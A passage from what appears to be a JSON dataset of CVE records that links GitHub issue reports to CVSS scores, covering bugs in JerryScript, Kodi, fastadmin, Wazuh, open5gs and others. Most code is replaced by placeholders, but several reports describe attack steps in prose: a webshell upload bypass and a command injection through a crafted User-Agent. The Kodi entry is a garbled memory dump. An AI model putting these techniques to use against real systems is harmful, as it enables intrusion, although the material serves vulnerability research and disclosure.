  90813. "description": "Buffer overflow in ecma builtin typedarray prototype.c. APITAG revision d NUMBERTAG e7 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ICE: Assertion 'object_p >type_flags_refs >= ECMA_OBJECT_REF_ONE' failed at PATHTAG (ecma_deref_object NUMBERTAG Error: ERR_FAILED_INTERNAL_ASSERTION Aborted (core dumped) Backtrace NUMBERTAG GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG f NUMBERTAG e NUMBERTAG in __GI_abort () at APITAG NUMBERTAG in jerry_port_fatal APITAG at PATHTAG NUMBERTAG fccb4a in jerry_fatal APITAG at PATHTAG NUMBERTAG fccba0 in jerry_assert_fail (assertion NUMBERTAG db0 \"object_p >type_flags_refs >= ECMA_OBJECT_REF_ONE\", file NUMBERTAG d NUMBERTAG PATHTAG function NUMBERTAG a NUMBERTAG APITAG \"ecma_deref_object\", line NUMBERTAG at PATHTAG NUMBERTAG f NUMBERTAG b NUMBERTAG in ecma_deref_object (object_p NUMBERTAG b NUMBERTAG APITAG ) at PATHTAG NUMBERTAG f NUMBERTAG in ecma_free_value (value NUMBERTAG at PATHTAG NUMBERTAG f NUMBERTAG in ecma_fast_free_value (value NUMBERTAG at PATHTAG NUMBERTAG fea NUMBERTAG in opfunc_call (frame_ctx_p NUMBERTAG ffcb NUMBERTAG d NUMBERTAG at PATHTAG NUMBERTAG ff5e4b in vm_execute (frame_ctx_p NUMBERTAG ffcb NUMBERTAG d NUMBERTAG at PATHTAG NUMBERTAG ff NUMBERTAG ea in vm_run (shared_p NUMBERTAG ffcb NUMBERTAG d NUMBERTAG a0, this_binding_value NUMBERTAG lex_env_p NUMBERTAG b NUMBERTAG APITAG ) at PATHTAG NUMBERTAG fb NUMBERTAG in ecma_op_function_call_simple (func_obj_p NUMBERTAG b NUMBERTAG APITAG , this_arg_value NUMBERTAG APITAG arguments_list_len NUMBERTAG at PATHTAG NUMBERTAG fb1a NUMBERTAG in ecma_op_function_call (func_obj_p NUMBERTAG b NUMBERTAG APITAG , this_arg_value NUMBERTAG APITAG arguments_list_len NUMBERTAG at PATHTAG NUMBERTAG fea4a9 in opfunc_call (frame_ctx_p NUMBERTAG ffcb NUMBERTAG d NUMBERTAG d0) at PATHTAG NUMBERTAG ff5e4b in vm_execute (frame_ctx_p NUMBERTAG ffcb NUMBERTAG d NUMBERTAG d0) at PATHTAG NUMBERTAG ff NUMBERTAG ea in vm_run (shared_p NUMBERTAG ffcb NUMBERTAG d NUMBERTAG e0, this_binding_value NUMBERTAG lex_env_p NUMBERTAG b NUMBERTAG APITAG ) at PATHTAG NUMBERTAG fe NUMBERTAG c1 in vm_run_global (bytecode_p NUMBERTAG b6a8 APITAG , APITAG APITAG ) at PATHTAG NUMBERTAG f NUMBERTAG in jerry_run (func_val NUMBERTAG at PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG in main (argc NUMBERTAG arg NUMBERTAG ffcb NUMBERTAG d NUMBERTAG c8) at PATHTAG NUMBERTAG f NUMBERTAG e NUMBERTAG b3 in __libc_start_main (main NUMBERTAG f NUMBERTAG APITAG , argc NUMBERTAG arg NUMBERTAG ffcb NUMBERTAG d NUMBERTAG c8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG ffcb NUMBERTAG d NUMBERTAG b8) at PATHTAG NUMBERTAG f NUMBERTAG ce in _start () Expected behavior APITAG in ecma builtin typearray APITAG should check type of the array give backed by filter. We have already made this crash an arbitrary read/write, if you need that APITAG please contact us.",
  90814. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  90815. "severity": "CRITICAL",
  90816. "baseScore": 9.8,
  90817. "impactScore": 5.9,
  90818. "exploitabilityScore": 3.9
  90819. },
  90820. {
  90821. "CVE_ID": "CVE-2021-42917",
  90822. "Issue_Url_old": "https://github.com/xbmc/xbmc/issues/20305",
  90823. "Issue_Url_new": "https://github.com/xbmc/xbmc/issues/20305",
  90824. "Repo_new": "xbmc/xbmc",
  90825. "Issue_Created_At": "2021-10-12T06:07:43Z",
  90826. "description": "Kodi NUMBERTAG Buffer Overflow. Bug report Describe the bug The attached ASX FILE causes a crash in Kodi NUMBERTAG on Windows NUMBERTAG To reproduce the issue, the attached file poc.asx can be used. it should crash with an access violation like the following: Thread NUMBERTAG E4 exit Thread E NUMBERTAG exit Thread E NUMBERTAG exit Breakpoint at NUMBERTAG FFB6E NUMBERTAG set! INT3 breakpoint at APITAG NUMBERTAG FFB6E NUMBERTAG E0BFF4F7E NUMBERTAG E0BFF4F7E NUMBERTAG FFB NUMBERTAG C NUMBERTAG return to APITAG from NUMBERTAG E0BFF4F7F NUMBERTAG E0BFF4F7F NUMBERTAG E0BFF4F NUMBERTAG Expected Behavior Should display file type not supported or unable to open file Actual Behavior To Reproduce Steps to reproduce the behavior: firstly, close running kodi application head =''' APITAG APITAG APITAG APITAG APITAG ''' APITAG fobj = APITAG APITAG APITAG poc.asx is generated now open with kodi . it will take hrs to open kodi .on some cases it crash FILETAG Debug NUMBERTAG E0BFF4D5C NUMBERTAG E0BFF4DB NUMBERTAG YK NUMBERTAG F NUMBERTAG E0BFF4D5D NUMBERTAG E0BFF4DB NUMBERTAG E0BFF4D5D NUMBERTAG E0BFF4DB NUMBERTAG YK NUMBERTAG F NUMBERTAG E0BFF4D5E NUMBERTAG E0BFF4DA NUMBERTAG ERRORTAG null NUMBERTAG or unexpected EOF found in input stream NUMBERTAG E0BFF4D5E NUMBERTAG FF NUMBERTAG DAD4D return to APITAG from APITAG NUMBERTAG E0BFF4D5F NUMBERTAG E0BFF4DB NUMBERTAG YK NUMBERTAG F NUMBERTAG E0BFF4D5F NUMBERTAG FFB6E NUMBERTAG C NUMBERTAG APITAG NUMBERTAG E0BFF4D NUMBERTAG E0BFF4D NUMBERTAG E0BFF4D NUMBERTAG YK NUMBERTAG F NUMBERTAG E0BFF4D NUMBERTAG E NUMBERTAG E0BFF4D NUMBERTAG E0BFF4D NUMBERTAG E0BFF4D NUMBERTAG CBDAC NUMBERTAG E0BFF4D NUMBERTAG FF NUMBERTAG D NUMBERTAG APITAG NUMBERTAG E0BFF4D NUMBERTAG CBDAC NUMBERTAG A0 &\"pt NUMBERTAG F NUMBERTAG E0BFF4DC NUMBERTAG CBDD NUMBERTAG F NUMBERTAG APITAG APITAG <REF HREF= PATHTAG NUMBERTAG E0BFF4DC NUMBERTAG E0BFF4DC NUMBERTAG CBF7D NUMBERTAG A NUMBERTAG E0BFF4DC NUMBERTAG BDA NUMBERTAG E0BFF4DC NUMBERTAG FF NUMBERTAG B NUMBERTAG B0 APITAG NUMBERTAG E0BFF4DC NUMBERTAG E0BFF4DC NUMBERTAG E0BFF4DC NUMBERTAG FFB NUMBERTAG E0BFF4DC NUMBERTAG E0BFF4DC NUMBERTAG E0BFF4DC NUMBERTAG E0BFF4DC NUMBERTAG E0BFF4DC NUMBERTAG CBF NUMBERTAG F NUMBERTAG E0BFF4DC NUMBERTAG E0BFF4DBA NUMBERTAG YK NUMBERTAG F NUMBERTAG E0BFF4DC NUMBERTAG E0BFF4DC NUMBERTAG E0BFF4DC NUMBERTAG CBF NUMBERTAG PATHTAG NUMBERTAG E0BFF4DC NUMBERTAG E0BFF4DCA NUMBERTAG E0BFF4DCA NUMBERTAG F NUMBERTAG E0BFF4DCB NUMBERTAG F3AC NUMBERTAG E0BFF4DCB NUMBERTAG FFB NUMBERTAG C NUMBERTAG CD return to APITAG from APITAG NUMBERTAG E0BFF4DCC NUMBERTAG CB4C NUMBERTAG AD NUMBERTAG F NUMBERTAG E0BFF4DCC NUMBERTAG CB4C NUMBERTAG AC NUMBERTAG E0BFF4DCD NUMBERTAG E0BFF4DD NUMBERTAG E0BFF4DCD NUMBERTAG FF NUMBERTAG CF1D NUMBERTAG return to APITAG from NUMBERTAG E0BFF4DCE NUMBERTAG CB4C NUMBERTAG AC NUMBERTAG E0BFF4DCE NUMBERTAG CBDDD NUMBERTAG F NUMBERTAG F NUMBERTAG E0BFF4DCF NUMBERTAG CBDDD NUMBERTAG F NUMBERTAG F NUMBERTAG E0BFF4DCF NUMBERTAG FFB6E NUMBERTAG F NUMBERTAG B return to APITAG from NUMBERTAG E0BFF4DD NUMBERTAG E0BFF4E NUMBERTAG PATHTAG NUMBERTAG E0BFF4DD NUMBERTAG CBDDD NUMBERTAG F NUMBERTAG F NUMBERTAG E0BFF4DD NUMBERTAG E0BFF4DD NUMBERTAG E0BFF4DD NUMBERTAG CB4C NUMBERTAG AC NUMBERTAG E0BFF4DD NUMBERTAG FF NUMBERTAG A NUMBERTAG D5 return to APITAG from APITAG NUMBERTAG E0BFF4DD NUMBERTAG E0BFF4E NUMBERTAG PATHTAG NUMBERTAG E0BFF4DD NUMBERTAG CB6C NUMBERTAG A NUMBERTAG F NUMBERTAG E0BFF4DD NUMBERTAG E0BFF4DD NUMBERTAG E0BFF4E NUMBERTAG PATHTAG NUMBERTAG E0BFF4DD NUMBERTAG CB4C NUMBERTAG AD NUMBERTAG F NUMBERTAG E0BFF4DD NUMBERTAG CB4C NUMBERTAG AC NUMBERTAG E0BFF4DD NUMBERTAG C NUMBERTAG E0BFF4DD NUMBERTAG FF NUMBERTAG E NUMBERTAG B return to APITAG from APITAG NUMBERTAG E0BFF4DD NUMBERTAG E0BFF4DE NUMBERTAG E0BFF4DD NUMBERTAG E0BFF4DD NUMBERTAG FFFFFFFFFFFFFFFE NUMBERTAG E0BFF4DD NUMBERTAG CBDA NUMBERTAG PATHTAG NUMBERTAG E0BFF4DD NUMBERTAG CB4AB NUMBERTAG E0BFF4DD NUMBERTAG E0BFF4DDA NUMBERTAG F NUMBERTAG E0BFF4DDA NUMBERTAG F NUMBERTAG C NUMBERTAG E0BFF4DDB NUMBERTAG E0BFF4DDB NUMBERTAG E0BFF4DDC NUMBERTAG E0BFF4EB NUMBERTAG E0BFF4DDC NUMBERTAG E0BFF4DDD NUMBERTAG CB6CA4D NUMBERTAG F NUMBERTAG E0BFF4DDD NUMBERTAG CB6C NUMBERTAG A NUMBERTAG F NUMBERTAG E0BFF4DDE NUMBERTAG E0BFF4DEF NUMBERTAG E0BFF4DDE NUMBERTAG FF NUMBERTAG C NUMBERTAG FEF return to APITAG from APITAG NUMBERTAG E0BFF4DDF NUMBERTAG CB4AB NUMBERTAG E0BFF4DDF NUMBERTAG CBF NUMBERTAG C NUMBERTAG E0BFF4DE NUMBERTAG E0BFF4DE NUMBERTAG E0BFF4DE NUMBERTAG CBD0D NUMBERTAG D0 PATHTAG NUMBERTAG E0BFF4DE NUMBERTAG FF NUMBERTAG CB NUMBERTAG BE return to APITAG from APITAG NUMBERTAG E0BFF4DE NUMBERTAG CB4AB NUMBERTAG E0BFF4DE NUMBERTAG CBF NUMBERTAG E NUMBERTAG E0BFF4DE NUMBERTAG E0BFF4DE NUMBERTAG E0BFF4DE NUMBERTAG CB4AB NUMBERTAG E0BFF4DE NUMBERTAG E0BFF4DE NUMBERTAG FFFFFFFFFFFFFFFE NUMBERTAG E0BFF4DE NUMBERTAG FFB NUMBERTAG C NUMBERTAG D1 return to APITAG from APITAG NUMBERTAG E0BFF4DE NUMBERTAG CB4AB NUMBERTAG E0BFF4DE NUMBERTAG FFFFFFFFFFFFFFFE NUMBERTAG E0BFF4DE NUMBERTAG E0BFF4DE NUMBERTAG CBF NUMBERTAG E0BFF4DE NUMBERTAG E0BFF4DE NUMBERTAG FFB NUMBERTAG C NUMBERTAG DC return to APITAG from APITAG NUMBERTAG E0BFF4DE NUMBERTAG E0BFF4DE NUMBERTAG E0BFF4E0F NUMBERTAG E0BFF4DEA NUMBERTAG E0BFF4DEA NUMBERTAG E0BFF4DEB NUMBERTAG E0BFF4DEB NUMBERTAG FFB NUMBERTAG C NUMBERTAG DC return to APITAG from APITAG NUMBERTAG E0BFF4DEC NUMBERTAG CBF3CAC NUMBERTAG nd descriptors. Usage: class APITAG APITAG def my_abstract_method(self, ...): ... NUMBERTAG E0BFF4DEC NUMBERTAG E0BFF4DED NUMBERTAG F6EC NUMBERTAG E0BFF4DED NUMBERTAG E0BFF4DEE NUMBERTAG E0BFF4DEE NUMBERTAG CBDA9AEE0 &\"\u00c0\u00c6I NUMBERTAG F NUMBERTAG E0BFF4DEF NUMBERTAG CBDA9AEE0 &\"\u00c0\u00c6I NUMBERTAG F NUMBERTAG E0BFF4DEF NUMBERTAG CBD0D NUMBERTAG D0 PATHTAG NUMBERTAG E0BFF4DF NUMBERTAG FFFFFFFF NUMBERTAG E0BFF4DF NUMBERTAG CBD0D NUMBERTAG D0 PATHTAG NUMBERTAG E0BFF4DF NUMBERTAG E0BFF4E NUMBERTAG E0BFF4DF NUMBERTAG FF NUMBERTAG CB NUMBERTAG AD return to APITAG from APITAG NUMBERTAG E0BFF4DF NUMBERTAG E0BFF4DF NUMBERTAG E0BFF4DF NUMBERTAG FF NUMBERTAG DB NUMBERTAG APITAG NUMBERTAG E0BFF4DF NUMBERTAG E0BFF4DF NUMBERTAG CBF NUMBERTAG DA NUMBERTAG E0BFF4DF NUMBERTAG FF NUMBERTAG FFD NUMBERTAG return to APITAG from APITAG NUMBERTAG E0BFF4DF NUMBERTAG CB4AB NUMBERTAG E0BFF4DF NUMBERTAG FFB NUMBERTAG C NUMBERTAG E0BFF4DF NUMBERTAG CBF NUMBERTAG E0BFF4DF NUMBERTAG FF NUMBERTAG FFD NUMBERTAG return to APITAG from APITAG NUMBERTAG E0BFF4DF NUMBERTAG CB4AB NUMBERTAG E0BFF4DF NUMBERTAG CBF0D4AC NUMBERTAG E0BFF4DF NUMBERTAG FFFFFFFFFFFFFFFE NUMBERTAG E0BFF4DF NUMBERTAG FFFFFFFFFFFFFFFE NUMBERTAG E0BFF4DF NUMBERTAG CB4AB NUMBERTAG E0BFF4DF NUMBERTAG E0BFF4DFA NUMBERTAG CBF NUMBERTAG A NUMBERTAG E0BFF4DFA8 FFFFFFFFFFFFFFFE NUMBERTAG E0BFF4DFB NUMBERTAG FCFC NUMBERTAG E0BFF4DFB NUMBERTAG C NUMBERTAG A NUMBERTAG E0BFF4DFC NUMBERTAG E0BFF4DFC NUMBERTAG CBDA9AEE0 &\"\u00c0\u00c6I NUMBERTAG F NUMBERTAG E0BFF4DFD NUMBERTAG B NUMBERTAG E0BFF4DFD NUMBERTAG CBDA9AEE0 &\"\u00c0\u00c6I NUMBERTAG F NUMBERTAG E0BFF4DFE NUMBERTAG CB NUMBERTAG A NUMBERTAG E0BFF4DFE NUMBERTAG CBD0A NUMBERTAG PATHTAG NUMBERTAG E0BFF4DFF NUMBERTAG E0BFF4E NUMBERTAG E0BFF4DFF NUMBERTAG FF NUMBERTAG FFD NUMBERTAG return to APITAG from APITAG NUMBERTAG E0BFF4E NUMBERTAG F NUMBERTAG C NUMBERTAG E0BFF4E NUMBERTAG FFB NUMBERTAG C NUMBERTAG D0 return to APITAG from APITAG NUMBERTAG E0BFF4E NUMBERTAG CBD0D NUMBERTAG D NUMBERTAG E0BFF4E NUMBERTAG FF NUMBERTAG CB NUMBERTAG BE return to APITAG from APITAG NUMBERTAG E0BFF4E NUMBERTAG F7BC NUMBERTAG E0BFF4E NUMBERTAG FF NUMBERTAG FFD NUMBERTAG return to APITAG from APITAG NUMBERTAG E0BFF4E NUMBERTAG CBD NUMBERTAG C1C0 \"\u00f0\u201cQ NUMBERTAG F NUMBERTAG E0BFF4E NUMBERTAG FF NUMBERTAG CB NUMBERTAG BE return to APITAG from APITAG NUMBERTAG E0BFF4E NUMBERTAG F7EC NUMBERTAG E0BFF4E NUMBERTAG CB NUMBERTAG C NUMBERTAG D NUMBERTAG F NUMBERTAG E0BFF4E NUMBERTAG E0BFF4E NUMBERTAG E0BFF4E NUMBERTAG E0BFF4E NUMBERTAG FFFFFFFFFFFFFFFE NUMBERTAG E0BFF4E NUMBERTAG FFFFFFFFFFFFFFFE NUMBERTAG E0BFF4E NUMBERTAG CB4C NUMBERTAG E0BFF4E NUMBERTAG FFFFFFFF NUMBERTAG E0BFF4E NUMBERTAG E0BFF4E NUMBERTAG PATHTAG NUMBERTAG E0BFF4E NUMBERTAG CBDFB4C NUMBERTAG APITAG %s %s terminating (autodelete NUMBERTAG E0BFF4E NUMBERTAG FF NUMBERTAG FC NUMBERTAG D5 return to APITAG from APITAG NUMBERTAG E0BFF4E0A NUMBERTAG E0BFF4E0A NUMBERTAG F NUMBERTAG E0BFF4E0B NUMBERTAG CBD0D NUMBERTAG D0 PATHTAG NUMBERTAG E0BFF4E0B NUMBERTAG FFB6E NUMBERTAG F NUMBERTAG B return to APITAG from NUMBERTAG E0BFF4E0C NUMBERTAG CBD0AA NUMBERTAG E0BFF4E0C NUMBERTAG FF NUMBERTAG FFD NUMBERTAG return to APITAG from APITAG NUMBERTAG E0BFF4E0D NUMBERTAG C8EC NUMBERTAG E0BFF4E0D NUMBERTAG CB NUMBERTAG A NUMBERTAG E0BFF4E0E NUMBERTAG C8FC NUMBERTAG E0BFF4E0E NUMBERTAG CBDA9AEE0 &\"\u00c0\u00c6I NUMBERTAG F NUMBERTAG E0BFF4E0F NUMBERTAG C NUMBERTAG C NUMBERTAG E0BFF4E0F NUMBERTAG FF NUMBERTAG CB NUMBERTAG BE return to APITAG from APITAG NUMBERTAG E0BFF4E NUMBERTAG E0BFF4E NUMBERTAG CBDA9AEE0 &\"\u00c0\u00c6I NUMBERTAG F NUMBERTAG E0BFF4E NUMBERTAG CBDFB4A NUMBERTAG PATHTAG NUMBERTAG E0BFF4E NUMBERTAG CBD NUMBERTAG C1C0 \"\u00f0\u201cQ NUMBERTAG F NUMBERTAG E0BFF4E NUMBERTAG E0BFF4E NUMBERTAG F NUMBERTAG E0BFF4E NUMBERTAG E0BFF4E NUMBERTAG E0BFF4E NUMBERTAG FF NUMBERTAG CB NUMBERTAG AD return to APITAG from APITAG NUMBERTAG E0BFF4E NUMBERTAG E0BFF4E NUMBERTAG E0BFF4E NUMBERTAG FF NUMBERTAG C NUMBERTAG E1 return to APITAG from APITAG NUMBERTAG E0BFF4E NUMBERTAG FF NUMBERTAG F0 APITAG NUMBERTAG E0BFF4E NUMBERTAG C NUMBERTAG E0BFF4E NUMBERTAG CBF0D4CC0 \" return list(iterable) Let the base class default method raise the ERRORTAG return APITAG o NUMBERTAG E0BFF4E NUMBERTAG FF NUMBERTAG FFD NUMBERTAG return to APITAG from APITAG NUMBERTAG E0BFF4E NUMBERTAG FFFFFFFFFFFFFFFE NUMBERTAG E0BFF4E NUMBERTAG FFFFFFFFFFFFFFFE NUMBERTAG E0BFF4E NUMBERTAG C NUMBERTAG C NUMBERTAG E0BFF4E NUMBERTAG CBF0D4CC0 \" return list(iterable) Let the base class default method raise the ERRORTAG return APITAG o NUMBERTAG E0BFF4E NUMBERTAG CBD NUMBERTAG A8F NUMBERTAG F NUMBERTAG E0BFF4E NUMBERTAG FF NUMBERTAG CB NUMBERTAG BE return to APITAG from APITAG NUMBERTAG E0BFF4F7E NUMBERTAG E0BFF4F7E NUMBERTAG FFB NUMBERTAG C NUMBERTAG return to APITAG from NUMBERTAG E0BFF4F7F NUMBERTAG E0BFF4F7F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E8FFFFFB NUMBERTAG E0BFF4F NUMBERTAG D0FFFFFB NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F8A NUMBERTAG E0BFF4F8A NUMBERTAG E0BFF4F8B NUMBERTAG E0BFF4F8B NUMBERTAG E0BFF4F8C NUMBERTAG E0BFF4F8C NUMBERTAG E0BFF4F8D NUMBERTAG E0BFF4F8D NUMBERTAG E0BFF4F8E NUMBERTAG E0BFF4F8E NUMBERTAG E0BFF4F8F NUMBERTAG E0BFF4F8F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG Your Environment Used Operating system: [ ] Windows NUMBERTAG Operating system version/name: Kodi version NUMBERTAG note: Once the issue is made we require you to update it with new information or Kodi versions should that be required. Team Kodi will consider your problem report however, we will not make any promises the problem will be solved.",
  90827. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  90828. "severity": "MEDIUM",
  90829. "baseScore": 5.5,
  90830. "impactScore": 3.6,
  90831. "exploitabilityScore": 1.8
  90832. },
  90833. {
  90834. "CVE_ID": "CVE-2021-43086",
  90835. "Issue_Url_old": "https://github.com/ARM-software/astc-encoder/issues/296",
  90836. "Issue_Url_new": "https://github.com/arm-software/astc-encoder/issues/296",
  90837. "Repo_new": "arm-software/astc-encoder",
  90838. "Issue_Created_At": "2021-10-22T05:18:39Z",
  90839. "description": "stack buffer overflow in function APITAG Version APITAG Environment Ubuntu NUMBERTAG bit Command Compile test program: APITAG Compile test program with address sanitizer: Update Makefile: CODETAG Compile program: APITAG Result The result of running without ASAN: CODETAG Information obtained by using ASAN: ERRORTAG Description ERRORTAG Poc Poc file is this URLTAG .",
  90840. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  90841. "severity": "CRITICAL",
  90842. "baseScore": 9.8,
  90843. "impactScore": 5.9,
  90844. "exploitabilityScore": 3.9
  90845. },
  90846. {
  90847. "CVE_ID": "CVE-2021-43117",
  90848. "Issue_Url_old": "https://github.com/ambitiousleader/some-automated-script/issues/1",
  90849. "Issue_Url_new": "https://github.com/ambitiousleader/some-automated-script/issues/1",
  90850. "Repo_new": "ambitiousleader/some-automated-script",
  90851. "Issue_Created_At": "2021-10-27T08:08:15Z",
  90852. "description": "fastadmin NUMBERTAG file upload getshell. Detail: FILETAG ERRORTAG PATHTAG Line NUMBERTAG FILETAG Four method ,analyse one by one PATHTAG APITAG Line NUMBERTAG check upload file size is not bigger than default FILETAG PATHTAG APITAG Line NUMBERTAG PHP file and HTML file is not allowed to upload FILETAG PATHTAG APITAG Line NUMBERTAG check file APITAG is default APITAG =$this >config FILETAG PATHTAG APITAG Line NUMBERTAG check upload file is a picture,because judgment is logical or,as long as type value in_array return true,we can upload other PHP suffix file that can be parsed\uff0csuch as php5,phtml,php3 and so on FILETAG change the content type to gif,filename to xx.phtml FILETAG however,phtml can't be parsed,I find that if the CMS is build with Debian or Ubuntu environment,attack can be APITAG or Ubuntu apache2 configuration file write as follow,it will contains mods enabled/ .conf file automatically\uff0cwhich default parse phtml as php FILETAG FILETAG so,access the shell address to complete the attack,this ip is my debian's ip address FILETAG",
  90853. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  90854. "severity": "CRITICAL",
  90855. "baseScore": 9.8,
  90856. "impactScore": 5.9,
  90857. "exploitabilityScore": 3.9
  90858. },
  90859. {
  90860. "CVE_ID": "CVE-2021-43398",
  90861. "Issue_Url_old": "https://github.com/weidai11/cryptopp/issues/1080",
  90862. "Issue_Url_new": "https://github.com/weidai11/cryptopp/issues/1080",
  90863. "Repo_new": "weidai11/cryptopp",
  90864. "Issue_Created_At": "2021-10-28T08:39:07Z",
  90865. "description": "Dangerous Correlation Between Key Length and Execution Time . Hello. I'm using Crypto++ built by the latest version of source code in this repository on Ubuntu NUMBERTAG The function is as follows: CODETAG It seems that the execution time of APITAG is positively correlated with the length of the private key instead of a constant value. I did a simple experiment and heres the result. But I haven't studied the reason yet. FILETAG I suppose this may leak the length information of the input private key and facilitate malicious attacks on key decryption. Besides, the execution time becomes abnormally long when the private key reaches hundreds of bytes long, which causes a little inconvenience to me. Hope you can check this case. Have a good day!",
  90866. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  90867. "severity": "MEDIUM",
  90868. "baseScore": 5.3,
  90869. "impactScore": 1.4,
  90870. "exploitabilityScore": 3.9
  90871. },
  90872. {
  90873. "CVE_ID": "CVE-2021-43518",
  90874. "Issue_Url_old": "https://github.com/teeworlds/teeworlds/issues/2981",
  90875. "Issue_Url_new": "https://github.com/teeworlds/teeworlds/issues/2981",
  90876. "Repo_new": "teeworlds/teeworlds",
  90877. "Issue_Created_At": "2021-10-23T10:33:38Z",
  90878. "description": "Stack buffer overflow (write) while loading map in APITAG APITAG The client crashes when an invalid map ( FILETAG is loaded. Such a map can be delivered to the client by a malicious server. Tested on Ubuntu NUMBERTAG Teeworlds version: APITAG URLTAG Compilation with ASAN: CODETAG Run and connect to a server that delivers an invalid map: ERRORTAG Compilation without ASAN: APITAG Run and connect to a server that delivers an invalid map: APITAG",
  90879. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  90880. "severity": "HIGH",
  90881. "baseScore": 7.8,
  90882. "impactScore": 5.9,
  90883. "exploitabilityScore": 1.8
  90884. },
  90885. {
  90886. "CVE_ID": "CVE-2021-43854",
  90887. "Issue_Url_old": "https://github.com/nltk/nltk/issues/2866",
  90888. "Issue_Url_new": "https://github.com/nltk/nltk/issues/2866",
  90889. "Repo_new": "nltk/nltk",
  90890. "Issue_Created_At": "2021-10-26T21:56:15Z",
  90891. "description": "word_tokenize/EN hangs on incorrect strings. Hi NLTK team, I have a string that I pass to APITAG (which uses ERRORTAG under the hood), and the call hangs. The string in question is taken from Wikipedia and is the result of some vandalism. It can be generated by this APITAG The call seems to hang, I did not go deep too much but after running this for a couple of hours I just stopped the process. What would be an ok solution to process this in a robust fashion? I have a pipeline that has correct sentences as well as, from time to time, this kind of sentences.",
  90892. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  90893. "severity": "HIGH",
  90894. "baseScore": 7.5,
  90895. "impactScore": 3.6,
  90896. "exploitabilityScore": 3.9
  90897. },
  90898. {
  90899. "CVE_ID": "CVE-2021-44079",
  90900. "Issue_Url_old": "https://github.com/wazuh/wazuh/issues/10858",
  90901. "Issue_Url_new": "https://github.com/wazuh/wazuh/issues/10858",
  90902. "Repo_new": "wazuh/wazuh",
  90903. "Issue_Created_At": "2021-11-16T09:26:07Z",
  90904. "description": "Active response tools allow arbitrary code execution. APITAG APITAG APITAG APITAG NUMBERTAG Active response script | APITAG | Packages | APITAG NUMBERTAG This issue was reported by MENTIONTAG We found a command injection bug in the active response script FILETAG . The alert json data is put in the shell command line as POST body for curl : CODETAG However the raw log line which could be partially controlled by attacker is also included in the the json data. Single quote in json is not escaped and therefore could be used to truncate the command: APITAG Steps to reproduce as follows. First, we add the APITAG active response in the config: CODETAG Then we setup a web server on the client machine, and send request with crafted User Agent: APITAG The shellshock APITAG will trigger an alert, and the crafted User Agent value which is contained in web server access.log would also be included in the command line as follows: CODETAG Here we use the single quote to jump out of APITAG and inject the command APITAG with semicolons. We can verify that on the server where the APITAG is running(the wazuh manager machine in this case since we set the location as server in the active response config): APITAG Special thanks to MENTIONTAG for detecting and reporting this issue to the team.",
  90905. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  90906. "severity": "CRITICAL",
  90907. "baseScore": 9.8,
  90908. "impactScore": 5.9,
  90909. "exploitabilityScore": 3.9
  90910. },
  90911. {
  90912. "CVE_ID": "CVE-2021-44081",
  90913. "Issue_Url_old": "https://github.com/open5gs/open5gs/issues/1206",
  90914. "Issue_Url_new": "https://github.com/open5gs/open5gs/issues/1206",
  90915. "Repo_new": "open5gs/open5gs",
  90916. "Issue_Created_At": "2021-10-18T14:24:48Z",
  90917. "description": "Version NUMBERTAG AMF stack smashing . When I use open5gs of version NUMBERTAG on Ubuntu NUMBERTAG system, I found a problem: When the UE is in initially registered period, if the length of MSIN\uff08part of Supi\uff09 exceeds the normal length by NUMBERTAG characters, AMF stack smashing will be caused, resulting in denial of AMF service FILETAG I analyzed the causes of this problem: When open5gs handles the APITAG process, the requested space size is fixed\uff08OGS_MAX_IMSI_BCD_LEN is NUMBERTAG and AMF does not verify the length of Supi APITAG leads to stack overflow FILETAG",
  90918. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  90919. "severity": "HIGH",
  90920. "baseScore": 7.5,
  90921. "impactScore": 3.6,
  90922. "exploitabilityScore": 3.9
  90923. },
  90924. {
  90925. "CVE_ID": "CVE-2021-44124",
  90926. "Issue_Url_old": "https://github.com/vext01/hiby-issues/issues/9",
  90927. "Issue_Url_new": "https://github.com/vext01/hiby-issues/issues/9",
  90928. "Repo_new": "vext01/hiby-issues",
  90929. "Issue_Created_At": "2021-08-29T17:42:19Z",
  90930. "description": "Path traversal vulnerability in web server.. The web server used to upload music on Hiby OS devices doesn't protect against path traversal using APITAG . The vulnerability has already been publicly disclosed here: URLTAG This is still present in the latest NUMBERTAG firmware for the R3 Pro.",
  90931. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  90932. "severity": "HIGH",
  90933. "baseScore": 7.5,
  90934. "impactScore": 3.6,
  90935. "exploitabilityScore": 3.9
  90936. },
  90937. {
  90938. "CVE_ID": "CVE-2021-44657",
  90939. "Issue_Url_old": "https://github.com/pallets/jinja/issues/549",
